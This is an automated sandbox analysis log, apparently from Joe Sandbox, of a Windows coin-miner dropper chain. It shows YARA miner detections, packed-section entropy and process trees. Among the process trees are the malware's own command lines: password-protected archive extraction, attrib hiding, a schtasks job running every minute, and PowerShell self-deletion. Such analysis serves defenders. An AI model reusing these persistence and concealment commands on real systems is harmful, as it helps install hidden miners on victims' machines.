                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00BC88602_2_00BC8860
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00BC70492_2_00BC7049
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00BC31A82_2_00BC31A8
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00B84B302_2_00B84B30
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00B84DE02_2_00B84DE0
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00BC2D102_2_00BC2D10
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00BC779B2_2_00BC779B
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00BB7F362_2_00BB7F36
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00BC78BB3_2_00BC78BB
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00BC88603_2_00BC8860
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00BC70493_2_00BC7049
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00BC31A83_2_00BC31A8
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00B84B303_2_00B84B30
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00B84DE03_2_00B84DE0
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00BC2D103_2_00BC2D10
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00BC779B3_2_00BC779B
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00BB7F363_2_00BB7F36
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00B8E5306_2_00B8E530
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00BA61926_2_00BA6192
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00BC88606_2_00BC8860
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00B84B306_2_00B84B30
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00B84DE06_2_00B84DE0
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00BC2D106_2_00BC2D10
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00BA0E136_2_00BA0E13
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00BC70496_2_00BC7049
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00BC31A86_2_00BC31A8
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00BA16026_2_00BA1602
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00BC779B6_2_00BC779B
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00BC78BB6_2_00BC78BB
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00BA3DF16_2_00BA3DF1
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00BB7F366_2_00BB7F36
                            Source: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exeCode function: 8_2_00405BFC8_2_00405BFC
                            Source: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exeCode function: 8_2_0040B0E08_2_0040B0E0
                            Source: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exeCode function: 8_2_0040B0E48_2_0040B0E4
                            Source: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exeCode function: 8_2_004199738_2_00419973
                            Source: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exeCode function: 8_2_0040A9008_2_0040A900
                            Source: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exeCode function: 8_2_0040A2708_2_0040A270
                            Source: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exeCode function: 8_2_0040AC208_2_0040AC20
                            Source: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exeCode function: 8_2_00409C208_2_00409C20
                            Source: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exeCode function: 8_2_0040D4808_2_0040D480
                            Source: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exeCode function: 8_2_0040ED008_2_0040ED00
                            Source: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exeCode function: 8_2_00409DD08_2_00409DD0
                            Source: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exeCode function: 8_2_004196018_2_00419601
                            Source: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exeCode function: 8_2_004196DB8_2_004196DB
                            Source: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exeCode function: 8_2_00418F408_2_00418F40
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_007BF13E12_2_007BF13E
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_007B545812_2_007B5458
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_007B24C012_2_007B24C0
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_007B47AC12_2_007B47AC
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_007D881712_2_007D8817
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_007A0DCC12_2_007A0DCC
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_0079B11412_2_0079B114
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_0079F1B412_2_0079F1B4
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_007AC27812_2_007AC278
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_007C257812_2_007C2578
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_007D352812_2_007D3528
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_007C066E12_2_007C066E
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_007BD66C12_2_007BD66C
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_007AD85812_2_007AD858
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_007B694C12_2_007B694C
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_007C79DC12_2_007C79DC
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_007C99B812_2_007C99B8
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_007D49A512_2_007D49A5
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_007DDA3012_2_007DDA30
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_007CFA0C12_2_007CFA0C
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_007A7C6812_2_007A7C68
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_007DDC1112_2_007DDC11
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_007A8CA812_2_007A8CA8
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_007DDD0012_2_007DDD00
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_007B6E0812_2_007B6E08
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_007AAF5812_2_007AAF58
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_00798F1812_2_00798F18
                            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe 3D51B9523B387859BC0D94246DFB216CFA82F9D650C8D11BE11ED67F70E7440B
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeProcess token adjusted: SecurityJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00B9D663 appears 40 times
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00B9D942 appears 86 times
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00B97A00 appears 39 times
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00B9D64E appears 79 times
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00BB8E10 appears 47 times
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00B980C0 appears 393 times
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00B9DF80 appears 82 times
                            Source: C:\Users\user\Desktop\random.exe_Y.exeCode function: String function: 000B80C0 appears 130 times
                            Source: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exeCode function: String function: 004029A6 appears 44 times
                            Source: C:\Users\user\AppData\Local\Temp\1016876001\d7691cd336.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6316 -s 656
                            Source: random.exe_Y.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: 32.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                            Source: 32.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                            Source: 50.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                            Source: 50.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                            Source: 49.3.Intel_PTT_EK_Recertification.exe.1ae2b720000.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                            Source: 49.3.Intel_PTT_EK_Recertification.exe.1ae2b720000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                            Source: 49.3.Intel_PTT_EK_Recertification.exe.1ae2b720000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                            Source: 49.3.Intel_PTT_EK_Recertification.exe.1ae2b720000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                            Source: 31.3.Intel_PTT_EK_Recertification.exe.261b8c20000.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                            Source: 31.3.Intel_PTT_EK_Recertification.exe.261b8c20000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                            Source: 31.3.Intel_PTT_EK_Recertification.exe.261b8c20000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                            Source: 31.3.Intel_PTT_EK_Recertification.exe.261b8c20000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                            Source: 0000001F.00000003.2785095073.00000261B8C20000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                            Source: 0000001F.00000003.2785095073.00000261B8C20000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                            Source: 00000031.00000003.3117966316.000001AE2B720000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                            Source: 00000031.00000003.3117966316.000001AE2B720000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                            Source: random.exe_Y.exeStatic PE information: Section: ZLIB complexity 0.9982278184604905
                            Source: skotes.exe.0.drStatic PE information: Section: ZLIB complexity 0.9982278184604905
                            Source: random[1].exe.6.drStatic PE information: Section: .bss ZLIB complexity 1.0003407005613125
                            Source: random[1].exe.6.drStatic PE information: Section: .bss ZLIB complexity 1.0003407005613125
                            Source: c5bc1413d7.exe.6.drStatic PE information: Section: .bss ZLIB complexity 1.0003407005613125
                            Source: c5bc1413d7.exe.6.drStatic PE information: Section: .bss ZLIB complexity 1.0003407005613125
                            Source: random[1].exe0.6.drStatic PE information: Section: ahvfevpi ZLIB complexity 0.99450445861558
                            Source: 5b3f6dd868.exe.6.drStatic PE information: Section: ahvfevpi ZLIB complexity 0.99450445861558
                            Source: random[2].exe.6.drStatic PE information: Section: .bss ZLIB complexity 1.0003343485169491
                            Source: random[2].exe.6.drStatic PE information: Section: .bss ZLIB complexity 1.0003343485169491
                            Source: f1e68d5060.exe.6.drStatic PE information: Section: .bss ZLIB complexity 1.0003343485169491
                            Source: f1e68d5060.exe.6.drStatic PE information: Section: .bss ZLIB complexity 1.0003343485169491
                            Source: random[1].exe2.6.drStatic PE information: Section: ZLIB complexity 0.9950234951568265
                            Source: random[1].exe2.6.drStatic PE information: Section: ocizazuj ZLIB complexity 0.9929395791717885
                            Source: d7691cd336.exe.6.drStatic PE information: Section: ZLIB complexity 0.9950234951568265
                            Source: d7691cd336.exe.6.drStatic PE information: Section: ocizazuj ZLIB complexity 0.9929395791717885
                            Source: random.exe_Y.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                            Source: skotes.exe.0.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                            Source: d7691cd336.exe, 00000024.00000002.2843437233.0000000000659000.00000040.00000001.01000000.0000000E.sdmp, d7691cd336.exe, 00000024.00000003.2802728804.0000000004858000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: .a_po^ ojYd.o B U.R G v.Q_F& ZNH K.9.sV`OQ qOq_A( N5.j P.X z.k.Yf_HL.P.L`.C Ue_q_B_t.h{_yr\=A f.3_q_Fvb_H_bm W.UP#.by_iY.Yw I.Y_G p.3c g.Zy S v.U.N C_m Z_i.H_j B l_DH_Pd.iz_O.f~ U z_Mv_d7 T Mz.f.594/}_m kS.v.D u.rZu.S G.N_x.V J.Q.G FO^.X<.6_fv.V ny.L,_E.2.m I_l.b$ Mx sZ.K! p.Y.U.V:U.89 R_H F3.d_R A UQ.C_y y Y Jb.Q_S.N.s< l_Ab~[_w9zV?!C9.N_HQ)*_n R.tP Ww_u aU;.V EPk Xr.Q0.y.A!]_b!7 g.R_pF.E_b o.o.q.o_E.T_rdfw.c}_ck.4.Y_w:_P.B(#`_xy_i.3_Y.A_N.q.6.YE_S_T.R H n.R_d_F.V.s_R68).I aL q.H b.W.Q!.r b_w c c$_va.X_v.tRm l.sln_D c! C.7_F m M_j6 zr.w F i}%_N.RB A7_wG_m.4_A#&.G mCx.Q_s N pTS.n.e C.4_v_C_Q.e J q7E V P.LP_Q.kTN_c.F.D gc.hT_s_Q1
                            Source: d7691cd336.exe, 00000024.00000002.2843437233.0000000000659000.00000040.00000001.01000000.0000000E.sdmp, d7691cd336.exe, 00000024.00000003.2802728804.0000000004858000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: .tRm l.sln_D c! C.7_F m M_j6 zr.w F i}%_N.RB A7_wG_m.4_A#&.G mCx.Q_s N pTS.n.e C.4_v_
                            Source: classification engineClassification label: mal100.troj.spyw.evad.mine.winEXE@81/44@19/8
                            Source: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exeCode function: 8_2_00409606 wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree,8_2_00409606
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_0079AC74 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,12_2_0079AC74
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_007A1D04 GetCurrentProcess,CloseHandle,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,12_2_007A1D04
                            Source: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exeCode function: 8_2_0040122A GetDiskFreeSpaceExW,SendMessageW,8_2_0040122A
                            Source: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exeCode function: 8_2_004092C1 GetDlgItem,GetDlgItem,SendMessageW,GetDlgItem,GetWindowLongW,GetDlgItem,SetWindowLongW,GetSystemMenu,EnableMenuItem,GetDlgItem,SetFocus,SetTimer,CoCreateInstance,GetDlgItem,IsWindow,GetDlgItem,EnableWindow,GetDlgItem,ShowWindow,8_2_004092C1
                            Source: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exeCode function: 8_2_004020BF GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,wsprintfW,LoadLibraryA,GetProcAddress,8_2_004020BF
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exeJump to behavior
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1920:120:WilError_03
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3664:120:WilError_03
                            Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-41f5ca1f-12f2-e123ed-b12badd5efaa}
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5580:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6260:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4000:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5856:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2720:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6860:120:WilError_03
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3788:120:WilError_03
                            Source: C:\Users\user\Desktop\random.exe_Y.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                            Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\explorer.exe
                            Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\explorer.exe
                            Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\explorer.exe
                            Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\explorer.exe
                            Source: C:\Users\user\Desktop\random.exe_Y.exeFile read: C:\Users\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\random.exe_Y.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeFile read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeFile read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeFile read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeFile read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeFile read: C:\Windows\System32\drivers\etc\hosts
                            Source: random.exe_Y.exeVirustotal: Detection: 54%
                            Source: random.exe_Y.exeReversingLabs: Detection: 50%
                            Source: random.exe_Y.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                            Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                            Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                            Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                            Source: C:\Users\user\Desktop\random.exe_Y.exeFile read: C:\Users\user\Desktop\random.exe_Y.exeJump to behavior
                            Source: unknownProcess created: C:\Users\user\Desktop\random.exe_Y.exe "C:\Users\user\Desktop\random.exe_Y.exe"
                            Source: C:\Users\user\Desktop\random.exe_Y.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exe "C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exe"
                            Source: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 65,10
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextracted
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextracted
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextracted
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +H "in.exe"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe"
                            Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\attrib.exe attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                            Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\attrib.exe attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                            Source: C:\Windows\System32\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
                            Source: C:\Windows\System32\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
                            Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
                            Source: unknownProcess created: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                            Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\explorer.exe explorer.exe
                            Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.1.10.1
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1016876001\d7691cd336.exe "C:\Users\user\AppData\Local\Temp\1016876001\d7691cd336.exe"
